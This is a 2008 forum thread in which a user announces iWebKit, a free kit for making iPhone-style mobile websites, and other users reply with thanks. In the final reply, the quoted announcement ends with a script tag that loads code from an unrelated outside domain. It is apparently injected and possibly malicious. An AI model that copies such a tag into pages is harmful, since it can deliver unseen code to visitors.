Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: [Release] iWebKit

Lightbulb [Release] iWebKit
    It's finally here, iWebKit
    on iWebKit.net

What is it:
    A very easy way to create your own ipod/iphone size website reproducing the original apple style. Easy to install even if you don't have HTML knowledge and easy to customize.

Why do i want this:
    You want this because using iwebkit you can create your own website! and not only a normal website but a cool mobile website! Impress your friends and familly, Forget about facebook and let people go to your own website . You can set it up in 1 hour maximum.

Price:
    Yup the most important part...
    Well it's free! Donations are appreciated.

Where can i get it?
    On my website: iWebKit
    Go to that website on your ipod to see what your site will look like. Download the package (http://www.mediafire.com/iwebkit).
    Next follow he guide on my website.

What else:
    Well there are cool themes, Scripts and plugins to add to extend and make your website the best website out there!
    Last edited by Winterboard; 08-29-2008 at 10:45 AM.

2. The Following User Says Thank You to Winterboard For This Useful Post:

Onemajorflaw (08-31-2008)

great tool, thanks

Nice! going to use it right now

P.S.: Sticky!

iPhone? More like MyPhone Renblade's Avatar
    Thanks

Awesome! Gonna give it a shot when I get on my PC. Perhaps I shall donate if I like what I see.

thanks guys! ive worked hard on itand it will improve in the future!

Just loaded it up. Very cool. I'll definitely play around with this. The pages look great on the iPhone.

cool can you post the url so i cansee and maybe give you tips??

Quote Originally Posted by Winterboard View Post
    It's finally here, iWebKit
    on iWebKit.net

What is it:
    A very easy way to create your own ipod/iphone size website reproducing the original apple style. Easy to install even if you don't have HTML knowledge and easy to customize.

Why do i want this:
    You want this because using iwebkit you can create your own website! and not only a normal website but a cool mobile website! Impress your friends and familly, Forget about facebook and let people go to your own website . You can set it up in 1 hour maximum.

Price:
    Yup the most important part...
    Well it's free! Donations are appreciated.

Where can i get it?
    On my website: iWebKit
    Go to that website on your ipod to see what your site will look like. Download the package (http://www.mediafire.com/iwebkit).
    Next follow he guide on my website.

What else:
    Well there are cool themes, Scripts and plugins to add to extend and make your website the best website out there!<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    nice post dude help a lot